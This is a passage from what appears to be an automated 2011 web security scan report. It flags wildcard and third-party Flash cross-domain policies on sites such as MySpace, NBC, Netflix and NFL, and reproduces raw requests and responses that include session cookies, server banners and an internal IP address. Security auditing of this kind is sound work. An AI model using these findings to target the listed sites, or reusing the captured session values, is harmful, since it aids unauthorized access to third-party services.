<allow-access-from domain="www.facebook.com" secure="false"/>
...[SNIP]...

7.351. http://www.myspace.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: -1
Last-Modified: Thu, 31 Mar 2011 20:31:08 GMT
Accept-Ranges: bytes
ETag: "0ceba90e2efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: d1bdf6f06cd35da50a6e10c21d32924f35d6b802c52849dd
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634373194473101509&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sat, 09-Apr-2011 12:37:27 GMT; path=/
Set-Cookie: SessionDDF2=I9TZrF+dXtP5q7zVPpjFdVpZctbsjZRwzVlHfD+hE2m3WIg8WOAefoUm5K+Uc7t62p94MdtQD98HE0BEH7VT5Q==; domain=.myspace.com; expires=Wed, 02-Apr-2031 12:37:27 GMT; path=/
X-PoweredBy: The Force
Date: Sat, 02 Apr 2011 12:37:27 GMT
Connection: keep-alive
Content-Length: 680
X-Vertical: profileidentities

<cross-domain-policy>
   <allow-access-from domain="*.fimservecdn.com" />
   <allow-access-from domain="lads.myspace.cn" />
   <allow-access-from domain="*.ilike.com" />
   <allow-http-request-headers-fro
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" />
   <allow-access-from domain="*.myspace.com" />
...[SNIP]...

7.352. http://www.myxer.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myxer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myxer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:18 GMT
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Last-Modified: Sat, 18 Jul 2009 09:06:49 GMT
Accept-Ranges: bytes
ETag: "80da2115877ca1:0"
X-UA-Compatible: IE=8
Content-Length: 363
Set-Cookie: SERVERID=PW06; path=/
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.myxer.com" />
   <allow-access-from domain="*.myxertones.com" />
   <allow-access-from domain="msbsfl.dyndns.org" />
<allow-access-from domain="*.mxr.cc" />
...[SNIP]...

7.353. http://www.myyearbook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myyearbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:54 GMT
Server: Apache
Last-Modified: Mon, 28 Sep 2009 08:13:22 GMT
ETag: "79e4f3-570-4749edf02cc80"
Accept-Ranges: bytes
Content-Length: 1392
X-Server-Name: web27
Connection: close
Content-Type: text/x-cross-domain-policy
X-MyPoolMember: 10.100.10.77

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*.myyearbook.com"/>
   <allow-access-from domain="*.mybdev.com"/>
   <allow-access-from domain="*.mybstaff.com"/>
   <allow-access-from domain="*.coolapps.com"/>
   <allow-access-from domain="*.mybcdna.com"/>
   <allow-access-from domain="*.mybcdnb.com"/>
   <allow-access-from domain="*.mybcdnc.com"/>
   <allow-access-from domain="*.mybcdnd.com"/>
   <allow-access-from domain="*.mybcdne.com"/>
   <allow-access-from domain="*.mybcdnf.com"/>
...[SNIP]...

7.354. http://www.nascar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nascar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nascar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:01 GMT
Server: Apache
Last-Modified: Sat, 05 Jun 2010 16:12:55 GMT
Accept-Ranges: bytes
Content-Length: 819
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nascar.com" />
<allow-access-from domain="*.sportvision.com" />
<allow-access-from domain="*.cnn.com" />
<allow-access-from domain="*.turner.com" />
<allow-access-from domain="*.cnn.net" />
<allow-access-from domain="*.fedex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.toptrumps.com"/>
<allow-access-from domain="*.toptrumpslive.com"/>
<allow-access-from domain="*.officedepotracing.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="cdn.eyewonder.com"/>
<allow-access-from domain="cdn1.eyewonder.com"/>
<allow-access-from domain="apps.eyewonderlabs.com"/>
...[SNIP]...

7.355. http://www.nationalgeographic.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nationalgeographic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nationalgeographic.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Length: 1633
Xonnection: Xeep-Alive
Content-Type: text/xml
X-Cache-Lookup: HIT from rpc4.int.ngeo.com:80
Cache-Control: max-age=9401
Expires: Sat, 02 Apr 2011 16:04:18 GMT
Date: Sat, 02 Apr 2011 13:27:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.extremeexplorer.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ngm.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ngm.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ngm.typepad.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.google.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thegreenguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="thegreenguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.co.in" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.com.au" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tremormedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ngeo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="u23dmovie.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.u23dmovie.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fieldscope.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fieldscope.us" secure="false" />
...[SNIP]...

7.356. http://www.nba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nba.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 20 Dec 2010 20:43:32 GMT
Accept-Ranges: bytes
Content-Length: 2010
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:25:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.turner.com" />
   <allow-access-from domain="*.nba.com" />
   <allow-access-from domain="*.wnba.com" />
   <allow-access-from domain="*.airplay.com" />
   <allow-access-from domain="*.apnwi.com" />
   <allow-access-from domain="*.codeandtheory.com" />
   <allow-access-from domain="*.equakecreative.com" />    
   <allow-access-from domain="*.equakecreative2.com" />    
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="*.gmodules.com" />
   <allow-access-from domain="*.gsipartners.com" />
   <allow-access-from domain="*.gspt.net" />
   <allow-access-from domain="*.iamatrailblazersfan.com" />
   <allow-access-from domain="*.jivesoftware.com" />
   <allow-access-from domain="*.liveworld.com" />
   <allow-access-from domain="*.myspace.com" />
   <allow-access-from domain="*.nike.com" />
   <allow-access-from domain="nba.goodbysilverstein.com" />
   <allow-access-from domain="*.onebowerman.com" />
   <allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.radassembly.com" />
   <allow-access-from domain="search.atomz.com" />
   <allow-access-from domain="*.synergymedia.net" />
   <allow-access-from domain="*.toptrumps.com" />
   <allow-access-from domain="*.toptrumpslive.com" />
   <allow-access-from domain="*.trinityeffects.com" />
   <allow-access-from domain="*.yinteract.com" />
<allow-access-from domain="*.tnt.tv" />
<allow-access-from domain="*.imageg.net" />
<allow-access-from domain="*.dickssportinggoods.com" />
<allow-access-from domain="*.eloqua.com" />
<allow-access-from domain="*.mycavsaccount.com" />
<allow-access-from domain="*.cavfanatic.com" />
<allow-access-from domain="*.attractv.net" />
<allow-access-from domain="*.nbahooptroop.com" />
<allow-access-from domain="127.0.0.1"/>
...[SNIP]...

7.357. http://www.nbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Last-Modified: Tue, 21 Sep 2010 17:56:56 GMT
ETag: "36701c4-bbc-490c8c1324a00"
Accept-Ranges: bytes
Content-Length: 3004
Wirt: (null)
Content-Type: application/xml
Cache-Control: max-age=5
Expires: Sat, 02 Apr 2011 13:24:33 GMT
Date: Sat, 02 Apr 2011 13:24:28 GMT
Connection: close
Set-Cookie: ak-mobile-true=no; expires=Sun, 03-Apr-2011 13:24:28 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="boards.nbc.com" />
<allow-access-from domain="blogs.nbc.com" />
<allow-access-from domain="*.nbc.com" />
<allow-access-from domain="*.samantha48616e61.com" />
<allow-access-from domain="chuckssecret.com" />
<allow-access-from domain="www.gold4sex.com" />
<allow-access-from domain="www.chuckssecret.com" />
<allow-access-from domain="itm2083.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="biggestloser.msn.com" />
<allow-access-from domain="*.nbcuni.com" />
<allow-access-from domain="www.biggestloser.msn.com" />
<allow-access-from domain="swf.userplane.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.ingaylewetrust.com" />
<allow-access-from domain="external.admin.nbc.nbcuni.com" />
<allow-access-from domain="127.0.0.1" />
<allow-access-from domain="localhost" />
<allow-access-from domain="*.theparenthoodproject.com" headers="*"/>
<allow-access-from domain="*.jaylenosgarage.com" headers="*"/>
<allow-access-from domain="*.dundermifflininfinity.com" headers="*"/>
<allow-access-from domain="*.ingaylewetrust.com" headers="*"/>
<allow-access-from domain="*.latenightwithjimmyfallon.com" headers="*"/>
<allow-access-from domain="*.msn.com" headers="*"/>
<allow-access-from domain="*.yahoo.com" headers="*"/>
<allow-access-from domain="*.unicast.com" headers="*"/>
<allow-access-from domain="*.nbcagencywc4.com" headers="*"/>
<allow-access-from domain="*.themoreyouknow.com" headers="*"/>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.dialstar.tv"/>
<allow-access-from domain="*.truthseeker5314.com"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure=" false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure=" false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure=" false"/>
...[SNIP]...

7.358. http://www.nbcnewyork.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbcnewyork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbcnewyork.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:18:47 GMT
X-Server-Name: sj-c14-r3-u6
Content-Type: text/xml;charset=utf-8
Date: Sat, 02 Apr 2011 14:16:18 GMT
Content-Length: 1129
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.nbcbayarea.com"/>
<allow-access-from domain="*.nbcchicago.com"/>
<allow-access-from domain="*.nbcconnecticut.com"/>
<allow-access-from domain="*.nbcdfw.com"/>
<allow-access-from domain="*.nbclosangeles.com"/>
<allow-access-from domain="*.nbcmiami.com"/>
<allow-access-from domain="*.nbcnewyork.com"/>
<allow-access-from domain="*.nbcphiladelphia.com"/>
<allow-access-from domain="*.nbcsandiego.com"/>
<allow-access-from domain="*.nbcwashington.com"/>
<allow-access-from domain="*.nbclocalmedia.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.ftp.clickability.com"/>
<allow-access-from domain="widgets.nbcuni.com"/>
<allow-access-from domain="services.weatherplus.com"/>
<allow-access-from domain="*.thefeast.com"/>
<allow-access-from domain="*.client-projects.com"/>
<allow-access-from domain="*.edgecastcdn.net"/>
<allow-access-from domain="*.thelocalfeast.com"/>
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...

7.359. http://www.netflix.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netflix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netflix.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:47 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Cache-Control: private
Pragma: no-cache
Expires: Fri, 01 Apr 2011 12:43:47 GMT
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 89
Set-Cookie: VisitorId=002~bd8992b8-0627-47a7-8f99-633d2f1f6da5~1301748227374~true~1301748227374; Domain=.netflix.com; Expires=Sun, 01-Apr-2012 12:43:47 GMT; Path=/
Set-Cookie: nflxsid=222.1301748227374; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=222.792c5260-5137-49ae-a7d7-b71c75cdef3d; Domain=.netflix.com; Path=/
Set-Cookie: vstCnt=1~1~1301723027392; Domain=.netflix.com; Expires=Sun, 01-Apr-2012 12:43:47 GMT; Path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=66
Connection: Keep-Alive
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6b45525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

<cross-domain-policy>
<allow-access-from domain="*.netflix.com"/>
</cross-domain-policy>

7.360. http://www.newegg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newegg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newegg.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 02 Dec 2009 00:20:07 GMT
ETag: "e8c1e633e572ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
x-server-id: 110
X-UA-Compatible: IE=7
Content-Length: 265
Date: Sat, 02 Apr 2011 13:40:39 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:27 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newegg.com" />
<allow-access-from domain="*.newegg.ca" />
...[SNIP]...

7.361. http://www.newport-news.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newport-news.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newport-news.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Tue, 09 Mar 2010 18:43:28 GMT
ETag: "47f4cb68b8bfca1:1329"
Content-Length: 385
Date: Sat, 02 Apr 2011 13:56:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domainpolicy.dtd">
<cross-domain-policy>
   <allow-access-from domain="pm.allurent.net"/>
   <allow-access-from domain="*.pm.allurent.net"/>
   <allow-access-from domain="*.shared.allurent.net"/>
   <allow-access-from domain="*.newport-news.com.allurent.net"/>
...[SNIP]...

7.362. http://www.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:28 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=993
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

7.363. http://www.newsweek.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsweek.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsweek.com

Response

HTTP/1.1 200 OK
Age: 0
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:26:37 GMT
ETag: "132801d-1ce-49fb58d474dc0"
Last-Modified: Wed, 30 Mar 2011 16:20:15 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 2022418695
Content-Length: 462
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

7.364. http://www.nfl.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nfl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nfl.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: W/"3359-1301521068000"
Last-Modified: Wed, 30 Mar 2011 21:37:48 GMT
Content-Type: application/xml
Content-Length: 3359
Cache-Control: max-age=229
Expires: Sat, 02 Apr 2011 13:28:48 GMT
Date: Sat, 02 Apr 2011 13:24:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.nfl.com" />
   <allow-access-from domain="nfl.com" />
   <allow-access-from domain="*.gsislive.com" />
   <allow-access-from domain="*.superbowl.com" />
   <allow-access-from domain="superbowl.com" />
   <allow-access-from domain="clearspring.com" />
   <allow-access-from domain="*.clearspring.com" />
   <allow-access-from domain="*.2mdn.net" />
   <allow-access-from domain="66.192.35.242" />
   <allow-access-from domain="10.36.202.66" />
   <allow-access-from domain="192.150.10.200" />
   <allow-access-from domain="192.150.11.4" />
   <allow-access-from domain="192.150.8.7" />
   <allow-access-from domain="192.150.8.184" />
   <allow-access-from domain="192.150.4.10" />
   <allow-access-from domain="192.150.5.2" />
   <allow-access-from domain="192.150.5.150" />
   <allow-access-from domain="*.nfln.com" />
   <allow-access-from domain="*.nflnetworkaffiliates.com" />
   <allow-access-from domain="nfln.tierradev.com" />
   <allow-access-from domain="nfl.vmdataservices.com" />
   <allow-access-from domain="nfl2.vmdataservices.com" />
   <allow-access-from domain="smb.cdn.neulion.com" />
   <allow-access-from domain="nfl.cdnl3.neulion.net" />
   <allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.myspace.com"/>
   <allow-access-from domain="*.nfllabor.com"/>
   <allow-access-from domain="nfllabor.com"/>
   <allow-access-from domain="*.buffalobills.com"/>
   <allow-access-from domain="*.seahawks.com"/>
   <allow-access-from domain="*.panthers.com"/>
   <allow-access-from domain="*.chargers.com"/>
   <allow-access-from domain="*.bengals.com"/>
   <allow-access-from domain="*.titansonline.com"/>
   <allow-access-from domain="*.azcardinals.com"/>
   <allow-access-from domain="*.49ers.com"/>
   <allow-access-from domain="*.raiders.com"/>
   <allow-access-from domain="*.steelers.com"/>
   <allow-access-from domain="*.vikings.com"/>
   <allow-access-from domain="*.kcchiefs.com"/>
   <allow-access-from domain="*.detroitlions.com"/>
   <allow-access-from domain="*.miamidolphins.com"/>
   <allow-access-from domain="*.patriots.com"/>
   <allow-access-from domain="*.newyorkjets.com"/>
   <allow-access-from domain="*.baltimoreravens.com"/>
   <allow-access-from domain="*.clevelandbrowns.com"/>
   <allow-access-from domain="*.houstontexans.com"/>
   <allow-access-from domain="*.colts.com"/>
   <allow-access-from domain="*.jaguars.com"/>
   <allow-access-from domain="*.denverbroncos.com"/>
   <allow-access-from domain="*.dallascowboys.com"/>
   <allow-access-from domain="*.giants.com"/>
   <allow-access-from domain="*.philadelphiaeagles.com"/>
   <allow-access-from domain="*.redskins.com"/>
   <allow-access-from domain="*.chicagobears.com"/>
   <allow-access-from domain="*.packers.com"/>
   <allow-access-from domain="*.atlantafalcons.com"/>
   <allow-access-from domain="*.neworleanssaints.com"/>
   <allow-access-from domain="*.buccaneers.com"/>
   <allow-access-from domain="*.stlouisrams.com"/>
   <allow-access-from domain="yui.yahooapis.com"/>
   <allow-access-from domain="neulion.vo.llnwd.net"/>
   <allow-access-from domain="neulion.hs.llnwd.net"/>
   <allow-access-from domain="*.cdnl3.neulion.com"/>
   <allow-access-from domain="secure.footprint.net"/>
...[SNIP]...

7.365. http://www.nhl.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nhl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nhl.com

Response

HTTP/1.0 200 OK
ETag: "b6b86a-305-4957cdda67680"
Server: Apache
